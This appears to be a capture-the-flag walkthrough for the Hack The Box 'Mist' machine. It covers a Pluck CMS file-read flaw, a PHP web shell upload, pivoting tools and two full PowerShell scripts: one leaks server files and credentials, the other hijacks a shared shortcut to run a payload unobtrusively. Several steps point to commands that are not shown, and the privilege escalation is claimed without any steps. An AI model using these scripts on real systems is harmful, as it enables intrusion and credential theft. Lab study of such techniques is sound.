Introduction to Mist:
This write-up covers the "Mist" machine from Hack The Box, rated Insane difficulty. It walks through the reconnaissance, exploitation, and privilege escalation steps required to capture both flags.
Objective:
The goal of this walkthrough is to complete the “Mist” machine from Hack the Box by achieving the following objectives:
User Flag:
Root Flag:
Enumerating the Mist Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oN nmap_initial.txt 10.10.11.17
Nmap Output:
┌─[darknite@parrot]─[~/Documents/htb/mist]
└──╼ $nmap -sV -sC 10.10.11.17 -oA initial
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-24 19:49 EDT
Nmap scan report for 10.10.11.17
Host is up (0.18s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-generator: pluck 4.7.18
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-title: Mist - Mist
|_Requested resource was http://10.10.11.17/?file=mist
| http-robots.txt: 2 disallowed entries
|_/data/ /docs/
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.23 seconds
Analysis:
- Only port 80/tcp is open; the other 999 scanned ports are filtered. No SSH service is exposed, so initial access has to come through the web application.
- Port 80 (HTTP): Apache 2.4.52 (Win64) with OpenSSL 1.1.1m and PHP 8.1.1, serving Pluck CMS 4.7.18 (from the http-generator header). The Win64 build tells us the target is a Windows host.
- The PHPSESSID cookie is set without the HttpOnly flag, so any script injected into the page could read the session cookie.
- robots.txt disallows /data/ and /docs/. These are the first paths to look at, since /data/ is where Pluck keeps its settings and modules.
Web Enumeration:
Perform web enumeration to discover potentially exploitable directories and files.
Exploitation
Web Application Exploration:
Clicking “admin” redirects to a login page.
Pluck v4.7.18 has a known file-inclusion vulnerability that can lead to Remote Code Execution (RCE); exploiting it, however, requires administrator credentials. For details, see the GitHub issue on Pluck CMS.
Separately, the module file albums_getimage.php takes a file name in the ?image= parameter without verifying that the file is actually an image. A remote, unauthenticated attacker can therefore read the contents of arbitrary files, including server-side PHP source.
The referenced article suggests requesting http://10.10.11.17/data/modules/albums/albums_getimage.php?image=admin_backup.php, which returns the source of the admin_backup PHP page. In other words, /data/modules/albums/albums_getimage.php?image=admin_backup.php resolves to /data/settings/modules/albums/admin_backup.php on disk.
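As an added illustration (this is example code written for this write-up, not code from the original post or from Pluck), the PowerShell below requests a file through the albums_getimage.php read primitive, checks that what came back is PHP source rather than image bytes, and lists any PHP string assignments in it, since that is where configuration values such as credentials usually live. The host and file name are the ones quoted above; the function names and the regex are this example's own.

```powershell
# Added example (not from the original write-up): read a server-side file via
# the unauthenticated albums_getimage.php ?image= parameter and list the
# $name = 'value'; assignments found in the returned PHP source.

function Get-PluckFile {
    param(
        [Parameter(Mandatory)] [string] $BaseUrl,   # e.g. http://10.10.11.17
        [Parameter(Mandatory)] [string] $Name       # file name passed to ?image=
    )
    $uri  = "$BaseUrl/data/modules/albums/albums_getimage.php?image=$([uri]::EscapeDataString($Name))"
    $resp = Invoke-WebRequest -Uri $uri -UseBasicParsing -ErrorAction Stop
    # If the script sends an image content type, Content comes back as byte[];
    # decode it so the PHP source can be inspected as text either way.
    if ($resp.Content -is [byte[]]) {
        return [System.Text.Encoding]::UTF8.GetString($resp.Content)
    }
    return [string]$resp.Content
}

function Get-PhpStringAssignments {
    param([Parameter(Mandatory)] [string] $Source)
    # Matches $name = 'value'; and $name = "value"; (single line, same quote type)
    $pattern = '\$(?<name>\w+)\s*=\s*([''"])(?<value>.*?)\1\s*;'
    [regex]::Matches($Source, $pattern) | ForEach-Object {
        [pscustomobject]@{
            Name  = $_.Groups['name'].Value
            Value = $_.Groups['value'].Value
        }
    }
}

$base = 'http://10.10.11.17'
$src  = Get-PluckFile -BaseUrl $base -Name 'admin_backup.php'

# Sanity check: the read primitive should hand back raw PHP source. If the
# file had been executed instead of read, there would be no <?php tag.
if ($src -notmatch '<\?php') {
    Write-Warning 'Response does not look like PHP source; check the file name and path.'
}

# Keep a local copy for offline review, then show what the file assigns.
$src | Out-File -Encoding utf8 .\admin_backup.php
Get-PhpStringAssignments -Source $src | Format-Table -AutoSize
```

Because the file name is passed straight through, the same function can be pointed at other files under the module's directory; requesting a file that does not exist is a quick way to see what the script returns on failure, which helps distinguish "file not found" from "file found but empty".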
Go to the login page http://mist.htb/login.php
Following the steps in the referenced video, start by uploading a PHP shell as a module. A basic shell that executes commands directly may be tried first; switching to a Base64-encoded reverse shell can run into problems. In that case, p0wny-shell is a good alternative: it gives an interactive shell in the browser through PHP alone, without having to spawn a PowerShell reverse shell that may fail or be noticed.
To begin, create a zip package containing the shell for upload.
Let’s initiate our listener.
The p0wny-shell interface will look like the image above.
Let's run the shell shown above.
Boom! We’ve successfully established a connection back to us.
Modify one .lnk file in the C:\Common Applications directory.
We need to execute the command mentioned above.
It will appear similar to what’s shown above.
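The write-up's own command is not reproduced above. As an added illustration (example code written for this write-up, not the original post's command), the PowerShell below shows the general technique: open an existing .lnk in the C:\Common Applications directory through the WScript.Shell COM object, save its original target so it can be restored, point it at a payload, and read it back to confirm the change. The directory is the one named above; the shortcut name, the payload path and its arguments are placeholders.

```powershell
# Added example (not from the original write-up): rewrite a Windows shortcut so
# that opening it launches a payload. Paths other than the directory named in
# the write-up are placeholders.

$shortcutPath = 'C:\Common Applications\Example.lnk'   # assumed shortcut name
$payloadPath  = 'C:\Windows\System32\cmd.exe'
$payloadArgs  = '/c C:\Users\Public\payload.exe'       # assumed payload location

# Confirm the current account can actually write the shortcut before touching it.
if (-not (Test-Path $shortcutPath)) { throw "Shortcut not found: $shortcutPath" }
try {
    $fs = [System.IO.File]::Open($shortcutPath, 'Open', 'ReadWrite')
    $fs.Close()
} catch {
    throw "No write access to $shortcutPath : $_"
}

$shell = New-Object -ComObject WScript.Shell
$lnk   = $shell.CreateShortcut($shortcutPath)   # opens the existing .lnk

# Record the original target so the shortcut can be restored after use.
$original = [pscustomobject]@{
    TargetPath   = $lnk.TargetPath
    Arguments    = $lnk.Arguments
    IconLocation = $lnk.IconLocation
    WindowStyle  = $lnk.WindowStyle
}
$backup = Join-Path $env:TEMP 'lnk_backup.json'
$original | ConvertTo-Json | Out-File -Encoding utf8 $backup

# Point the shortcut at the payload, keep the original icon so it still looks
# like the original application, and start minimized (7) to stay unobtrusive.
$lnk.TargetPath  = $payloadPath
$lnk.Arguments   = $payloadArgs
$lnk.WindowStyle = 7
$lnk.Save()

# Verify by reading the shortcut back from disk.
$check = (New-Object -ComObject WScript.Shell).CreateShortcut($shortcutPath)
'Target now: {0} {1}' -f $check.TargetPath, $check.Arguments
'Backup of original target written to {0}' -f $backup
```

Check the directory's ACL first with `icacls "C:\Common Applications"` to see which accounts can modify shortcuts there, and restore the original TargetPath and Arguments from the backup once the shortcut has served its purpose, so that the next user who clicks it is not affected.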
Enumerating as Brandon.Keywarp
We have established a connection as the Brandon.Keywarp user.
As shown, Brandon.Keywarp is a domain user on DC01, which has the IP address 192.168.100.100. Based on the net user /domain result, our next move is to compromise another domain user account with higher privileges than Brandon's. To do that we need to reach DC01, which is why we set up port forwarding here.
We need to run the chisel command.
Unfortunately, DC01 sits on a different subnet (192.168.100.0/24), and traffic through the chisel tunnel still could not reach it.
After some time, we concluded that this approach does not work here.
After switching to the ligolo-ng proxy, it worked like a charm.
We can read the user flag by typing “type user.txt” command
Escalate to Root Privileges Access on Mist machine
Privilege Escalation:
At this point we have obtained Administrator access.
We can read the root flag by typing “type root.txt” command